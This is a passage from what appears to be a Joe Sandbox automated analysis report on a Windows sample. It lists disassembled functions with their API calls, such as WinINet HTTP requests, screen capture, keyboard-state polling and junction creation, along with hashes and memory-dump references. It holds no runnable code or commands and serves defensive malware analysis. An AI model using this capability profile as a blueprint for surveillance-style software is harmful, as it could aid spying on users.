                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: a1c8f977c27e1a26ba8adfc85633622bd1de440db0bd3429cf6c5105a99c7376
                                        • Instruction ID: 6a314d2bb336dc52f42417910503554dd0fa445078efba8d664f9796fa3ebd2d
                                        • Opcode Fuzzy Hash: a1c8f977c27e1a26ba8adfc85633622bd1de440db0bd3429cf6c5105a99c7376
                                        • Instruction Fuzzy Hash: A921D772A84754AFD7206BACAC4DFA937A5EF05F61F114129F901962D0DBEC9CC08BD4
                                        Function 00764E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,0078DCD0), ref: 00764E81
                                        • _wcslen.LIBCMT ref: 00764E95
                                        • _wcslen.LIBCMT ref: 00764EF3
                                        • _wcslen.LIBCMT ref: 00764F4E
                                        • _wcslen.LIBCMT ref: 00764F99
                                        • _wcslen.LIBCMT ref: 00765001
                                          • Part of subcall function 0070FD60: _wcslen.LIBCMT ref: 0070FD6B
                                        • GetDriveTypeW.KERNEL32(?,007B7C10,00000061), ref: 0076509D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: 70b10b4c4a21a87e999de7685cf586c39aa605da5ddcdb0edc5057cc3b6130fc
                                        • Instruction ID: 5df922110ff9152082d89cab6e0d2fe31fe5e393b564669716898c75373db980
                                        • Opcode Fuzzy Hash: 70b10b4c4a21a87e999de7685cf586c39aa605da5ddcdb0edc5057cc3b6130fc
                                        • Instruction Fuzzy Hash: AFB1F2316087029FC714DF28C990ABAB7E5FFA5720F14491DF99687292DB38DC44CBA2
                                        Function 00774946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078DCD0), ref: 00774A18
                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00774A2A
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0078DCD0), ref: 00774A4F
                                        • FreeLibrary.KERNEL32(00000000,?,0078DCD0), ref: 00774A9B
                                        • StringFromGUID2.OLE32(?,?,00000028,?,0078DCD0), ref: 00774B05
                                        • SysFreeString.OLEAUT32(00000009), ref: 00774BBF
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00774C25
                                        • SysFreeString.OLEAUT32(?), ref: 00774C4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                        • String ID: GetModuleHandleExW$kernel32.dll
                                        • API String ID: 354098117-199464113
                                        • Opcode ID: ddda31a148f7983517629d22bbebb0d5d8cecfe29e3db7ec68415cbd03ce30f2
                                        • Instruction ID: 8b3cea102d91e066fb9201e972c0ac5688ad54f20f9be3a0c6bd221958453e02
                                        • Opcode Fuzzy Hash: ddda31a148f7983517629d22bbebb0d5d8cecfe29e3db7ec68415cbd03ce30f2
                                        • Instruction Fuzzy Hash: E7122A71A00109EFDF14CF94C888EAAB7B9FF45354F25C098E909AB261D775ED42CBA0
                                        Function 0076CDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CE0D
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CE20
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CE34
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0076CE4D
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0076CE90
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0076CEA6
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CEB1
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CEE1
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CF39
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CF4D
                                        • InternetCloseHandle.WININET(00000000), ref: 0076CF58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 0f1a77b887c47c85993c72d233f4d1270afb9ee49268e73d655ba44f663a2fe9
                                        • Instruction ID: 8324ef989d707b9cf5cece5bd681cf8104d33f7c76d819a05f55394fd5714cda
                                        • Opcode Fuzzy Hash: 0f1a77b887c47c85993c72d233f4d1270afb9ee49268e73d655ba44f663a2fe9
                                        • Instruction Fuzzy Hash: 0C514AB1600608BFEB229F61C948ABA7BFDFF08754F108419F98A96250D779DD449BA0
                                        Function 00788ECE Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00788EF1
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00788F01
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00788F0C
                                        • CloseHandle.KERNEL32(00000000), ref: 00788F19
                                        • GlobalLock.KERNEL32(00000000), ref: 00788F27
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00788F36
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00788F3F
                                        • CloseHandle.KERNEL32(00000000), ref: 00788F46
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00788F57
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,?), ref: 00788F70
                                        • GlobalFree.KERNEL32(00000000), ref: 00788F80
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00788FA0
                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00788FD0
                                        • DeleteObject.GDI32(00000000), ref: 00788FF8
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0078900E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID:
                                        • API String ID: 3840717409-0
                                        • Opcode ID: b64cc663278179641f7f1450c5882aee407ea273f9ec96d126aeb1e79f105299
                                        • Instruction ID: 6d5425b14c1078b15863bbe18080fecc512e23f7d8a1ec31c5737dfccfe1bedf
                                        • Opcode Fuzzy Hash: b64cc663278179641f7f1450c5882aee407ea273f9ec96d126aeb1e79f105299
                                        • Instruction Fuzzy Hash: 35412D75640208BFDB21DF65DC48EAA7BB9FF89761F208059F905D7290DB389D01DB24
                                        Function 00772EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00772F35
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00772F45
                                        • CreateCompatibleDC.GDI32(?), ref: 00772F51
                                        • SelectObject.GDI32(00000000,?), ref: 00772F5E
                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00772FCA
                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00773009
                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0077302D
                                        • SelectObject.GDI32(?,?), ref: 00773035
                                        • DeleteObject.GDI32(?), ref: 0077303E
                                        • DeleteDC.GDI32(?), ref: 00773045
                                        • ReleaseDC.USER32(00000000,?), ref: 00773050
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 7ac832ed0a8ff30f8beda9b6302815e85a3dba3070c70716e88ad046a162413e
                                        • Instruction ID: 4ea994c48bf58a34ec4fbfdec2162b6ca2b98f1caaef58e51a5a3e78a9a4fae3
                                        • Opcode Fuzzy Hash: 7ac832ed0a8ff30f8beda9b6302815e85a3dba3070c70716e88ad046a162413e
                                        • Instruction Fuzzy Hash: D361F3B5D00219EFCF14CFA4D888EAEBBB6FF48310F208419E559A7250E779A941CF94
                                        Function 0075C80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(007C2990,000000FF,00000000,00000030), ref: 0075C888
                                        • SetMenuItemInfoW.USER32(007C2990,00000004,00000000,00000030), ref: 0075C8BD
                                        • Sleep.KERNEL32(000001F4), ref: 0075C8CF
                                        • GetMenuItemCount.USER32(?), ref: 0075C915
                                        • GetMenuItemID.USER32(?,00000000), ref: 0075C932
                                        • GetMenuItemID.USER32(?,-00000001), ref: 0075C95E
                                        • GetMenuItemID.USER32(?,?), ref: 0075C9A5
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0075C9EB
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CA00
                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CA21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                        • String ID: 0
                                        • API String ID: 1460738036-4108050209
                                        • Opcode ID: 4434666fc4e598a8d9abb99830f8878796df36e3f2b8d9f17fedb9c68aa9d3e5
                                        • Instruction ID: 788ca28d45f4245b41bb0662da2ec157393132d528b06ef1c1cfd48398d95c53
                                        • Opcode Fuzzy Hash: 4434666fc4e598a8d9abb99830f8878796df36e3f2b8d9f17fedb9c68aa9d3e5
                                        • Instruction Fuzzy Hash: 69616C70900349AFDB22CF64C898BEE7FB8FB05315F144019ED51A3291DBB9AD59CB60
                                        Function 00764678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0076469A
                                        • _wcslen.LIBCMT ref: 007646C7
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007646F7
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00764718
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00764728
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007647AF
                                        • CloseHandle.KERNEL32(00000000), ref: 007647BA
                                        • CloseHandle.KERNEL32(00000000), ref: 007647C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 1149970189-3457252023
                                        • Opcode ID: 4ea565e6de3f5000f8d8fc5899a6e17789f356f3cfb5acb6f1c0795b46aa47e2
                                        • Instruction ID: e51fdc2ecf4f79fef53db479b548702ffd2805437a90d90a0ff25ca26668f5ac
                                        • Opcode Fuzzy Hash: 4ea565e6de3f5000f8d8fc5899a6e17789f356f3cfb5acb6f1c0795b46aa47e2
                                        • Instruction Fuzzy Hash: EB31C8B1940209ABDB319FA4DC48FEB37BDEF89740F1041B5F905D60A0E7789B848B24
                                        Function 0075EEDC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 0075EEE0
                                          • Part of subcall function 0070F27E: timeGetTime.WINMM(?,?,0075EF00), ref: 0070F282
                                        • Sleep.KERNEL32(0000000A), ref: 0075EF0D
                                        • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 0075EF31
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0075EF53
                                        • SetActiveWindow.USER32 ref: 0075EF72
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075EF80
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075EF9F
                                        • Sleep.KERNEL32(000000FA), ref: 0075EFAA
                                        • IsWindow.USER32 ref: 0075EFB6
                                        • EndDialog.USER32(00000000), ref: 0075EFC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 81e01548fdcd6d12229cae35812b5ee5ab3e17aa5e1eed42bb0b75a12b2383e5
                                        • Instruction ID: 528b5de54fe8007b1c352d6bd2cadbe93c4e32c1366ed1b42c4ee3cc7286f01a
                                        • Opcode Fuzzy Hash: 81e01548fdcd6d12229cae35812b5ee5ab3e17aa5e1eed42bb0b75a12b2383e5
                                        • Instruction Fuzzy Hash: 5621A770244204BFEB146F60EC8DEAA3B6AF744356F20C419F855912E1DFBD8E44972C
                                        Function 0075A86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0075A8EE
                                        • SetKeyboardState.USER32(?), ref: 0075A959
                                        • GetAsyncKeyState.USER32(000000A0), ref: 0075A979
                                        • GetKeyState.USER32(000000A0), ref: 0075A990
                                        • GetAsyncKeyState.USER32(000000A1), ref: 0075A9BF
                                        • GetKeyState.USER32(000000A1), ref: 0075A9D0
                                        • GetAsyncKeyState.USER32(00000011), ref: 0075A9FC
                                        • GetKeyState.USER32(00000011), ref: 0075AA0A
                                        • GetAsyncKeyState.USER32(00000012), ref: 0075AA33
                                        • GetKeyState.USER32(00000012), ref: 0075AA41
                                        • GetAsyncKeyState.USER32(0000005B), ref: 0075AA6A
                                        • GetKeyState.USER32(0000005B), ref: 0075AA78
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                        • Instruction ID: fda3c06f4067317c9c4508227c272d996f1b9631237641e5e7ca1b98146537dc
                                        • Opcode Fuzzy Hash: 3e2029c50846280689ee253d2c21f81182402aa514677300eefef0f0fa26b206
                                        • Instruction Fuzzy Hash: 6151B63090479879FB35E7A049147EAAFB49F11341F0886AACDC25B1C2DBDCAA4CC762
                                        Function 00756555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00756571
                                        • GetWindowRect.USER32(00000000,?), ref: 0075658A
                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007565E8
                                        • GetDlgItem.USER32(?,00000002), ref: 007565F8
                                        • GetWindowRect.USER32(00000000,?), ref: 0075660A
                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0075665E
                                        • GetDlgItem.USER32(?,000003E9), ref: 0075666C
                                        • GetWindowRect.USER32(00000000,?), ref: 0075667E
                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 007566C0
                                        • GetDlgItem.USER32(?,000003EA), ref: 007566D3
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007566E9
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 007566F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 03c770e3dc38652da57564f5723d56c0a48b0f0b99031a12b7c68e8531b03c98
                                        • Instruction ID: 88b5f5e85ad8c670c77aeb803ec6446743ef3bd08eeb77382f9c2302b25fa60b
                                        • Opcode Fuzzy Hash: 03c770e3dc38652da57564f5723d56c0a48b0f0b99031a12b7c68e8531b03c98
                                        • Instruction Fuzzy Hash: E05120B0B40209AFDF18CF68DD85AAEBBB5FB48311F608129F919E72D0E7749D048B50
                                        Function 006F20D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F21E4: GetWindowLongW.USER32(?,000000EB), ref: 006F21F2
                                        • GetSysColor.USER32(0000000F), ref: 006F2102
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: eb2bdb76cfeb48de6374fdc66a6d28a01b61de6765680f8cf06dac75c3a8b94c
                                        • Instruction ID: 002c2c4327456cbf47bf1353000e4088fb960a3671c08efca2e7a42a8502579e
                                        • Opcode Fuzzy Hash: eb2bdb76cfeb48de6374fdc66a6d28a01b61de6765680f8cf06dac75c3a8b94c
                                        • Instruction Fuzzy Hash: B141C8315406499FEB309F389C98BBA3B67AB42730F254605FBA2872E1C7359D52DF14
                                        Function 007848F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0078499A
                                        • CreateCompatibleDC.GDI32(00000000), ref: 007849A1
                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007849B4
                                        • SelectObject.GDI32(00000000,00000000), ref: 007849BC
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007849C7
                                        • DeleteDC.GDI32(00000000), ref: 007849D1
                                        • GetWindowLongW.USER32(?,000000EC), ref: 007849DB
                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 007849F1
                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 007849FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                        • String ID: static
                                        • API String ID: 2559357485-2160076837
                                        • Opcode ID: 5e43cc0f145d5f01ce2b9b67f8c6ad863d53fbb471356a97850cf1f7639dc4f1
                                        • Instruction ID: 76f0783d33184958c1ec42e25071c2a4d0e874fce0fca1e87871ea2a1efb6f7e
                                        • Opcode Fuzzy Hash: 5e43cc0f145d5f01ce2b9b67f8c6ad863d53fbb471356a97850cf1f7639dc4f1
                                        • Instruction Fuzzy Hash: D831803218021AABDF21AFA4DC08FDA3BA9FF09724F114211FA54A60E0D779DC10DB58
                                        Function 0077458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007745B9
                                        • CoInitialize.OLE32(00000000), ref: 007745E7
